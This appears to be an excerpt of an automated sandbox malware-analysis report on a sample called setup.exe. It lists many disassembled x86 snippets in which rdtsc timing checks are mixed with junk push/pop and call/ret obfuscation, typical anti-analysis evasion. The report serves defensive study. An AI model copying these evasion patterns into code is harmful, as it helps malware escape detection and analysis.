                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 38338D second address: 3833B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F47D8E3B0A8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3833B5 second address: 3833BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F47D8E48266h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3833BF second address: 3833C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3833C3 second address: 383435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c jbe 00007F47D8E48266h 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 jmp 00007F47D8E48276h 0x0000001e pop eax 0x0000001f pop eax 0x00000020 xor ecx, 15AEA406h 0x00000026 push 00000003h 0x00000028 mov cx, di 0x0000002b push 00000000h 0x0000002d mov si, dx 0x00000030 push 00000003h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F47D8E48268h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov cx, di 0x0000004f push 4C96DD0Fh 0x00000054 push eax 0x00000055 push edx 0x00000056 jng 00007F47D8E48268h 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 383435 second address: 383483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 736922F1h 0x00000011 or cx, D831h 0x00000016 lea ebx, dword ptr [ebp+12458073h] 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F47D8E3B0A8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 sub dl, FFFFFFCEh 0x00000039 movzx ecx, bx 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jno 00007F47D8E3B0A8h 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 383600 second address: 38360A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3962DD second address: 3962E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3962E1 second address: 3962FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F47D8E4826Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3962FF second address: 396303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 396303 second address: 396309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A3FA0 second address: 3A3FB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4136 second address: 3A4167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47D8E4826Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F47D8E48279h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4167 second address: 3A416B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4535 second address: 3A453B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A453B second address: 3A455C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B3h 0x00000007 jp 00007F47D8E3B0A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A455C second address: 3A4578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48278h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4578 second address: 3A458C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47D8E3B0A6h 0x00000008 jnl 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4704 second address: 3A470E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47D8E4826Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A470E second address: 3A4715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4715 second address: 3A4723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007F47D8E48266h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4859 second address: 3A485F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4A23 second address: 3A4A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4BB3 second address: 3A4BCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4BCB second address: 3A4BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4BDA second address: 3A4BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4BDE second address: 3A4BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4BEE second address: 3A4BF8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F47D8E3B0AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4D50 second address: 3A4D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F47D8E48266h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4D5A second address: 3A4D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4D60 second address: 3A4D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F47D8E48268h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4D6E second address: 3A4D9E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F47D8E3B0AAh 0x00000008 jng 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F47D8E3B0B0h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b push edi 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4D9E second address: 3A4DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4DA7 second address: 3A4DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A4DAD second address: 3A4DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A507C second address: 3A5089 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A51F2 second address: 3A520A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48274h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A520A second address: 3A5229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b jne 00007F47D8E3B0C2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F47D8E3B0AAh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A5229 second address: 3A522D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A522D second address: 3A5231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A5B6C second address: 3A5B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A5D15 second address: 3A5D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A5FFB second address: 3A600D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 pop ecx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3A600D second address: 3A6012 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3AA2E6 second address: 3AA2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3AAAC3 second address: 3AAAE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F47D8E3B0B8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3ABD95 second address: 3ABD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3ABD99 second address: 3ABD9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 36E621 second address: 36E632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47D8E4826Bh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B29DA second address: 3B29DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B29DE second address: 3B29EB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B2E2F second address: 3B2E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F47D8E3B0A6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B2E3D second address: 3B2E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B2E41 second address: 3B2E67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d js 00007F47D8E3B0A6h 0x00000013 jl 00007F47D8E3B0A6h 0x00000019 popad 0x0000001a ja 00007F47D8E3B0ACh 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B2F8E second address: 3B2FC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47D8E48266h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F47D8E48277h 0x00000011 jnc 00007F47D8E4826Ch 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B2FC3 second address: 3B2FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47D8E3B0B8h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B316F second address: 3B3178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 379F7F second address: 379FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F47D8E3B0A6h 0x0000000e popad 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 pushad 0x00000016 jnp 00007F47D8E3B0A6h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push edx 0x00000022 jmp 00007F47D8E3B0B6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B4EFE second address: 3B4F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B54E3 second address: 3B54FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0B7h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B55D0 second address: 3B55E9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E4826Bh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B5FB4 second address: 3B5FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B68E9 second address: 3B68F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B72AA second address: 3B72B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B7143 second address: 3B7147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3B72B0 second address: 3B730F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F47D8E3B0B3h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F47D8E3B0A8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a jnp 00007F47D8E3B0B2h 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jno 00007F47D8E3B0A8h 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 376B15 second address: 376B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BA247 second address: 3BA24D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BAB94 second address: 3BAC35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47D8E48276h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F47D8E48268h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jmp 00007F47D8E48271h 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D3032h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007F47D8E48268h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 mov edi, esi 0x00000057 xchg eax, ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a jg 00007F47D8E4826Ch 0x00000060 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BA962 second address: 3BA973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BA973 second address: 3BA9A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F47D8E48270h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BA9A5 second address: 3BA9AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BC16E second address: 3BC188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48276h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BA9AB second address: 3BA9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BC188 second address: 3BC18C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BCC65 second address: 3BCC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BCC6A second address: 3BCC79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3BCC79 second address: 3BCC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F47D8E3B0A6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C2CFF second address: 3C2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C1D19 second address: 3C1D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C2D03 second address: 3C2D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F47D8E4826Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C3D47 second address: 3C3DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F47D8E3B0B0h 0x0000000f nop 0x00000010 sub dword ptr [ebp+1247A6F6h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F47D8E3B0A8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D322Fh] 0x00000038 push 00000000h 0x0000003a sub dword ptr [ebp+122D2CD2h], ecx 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C2F5A second address: 3C2F68 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C5F93 second address: 3C5FB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3C5FB3 second address: 3C5FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
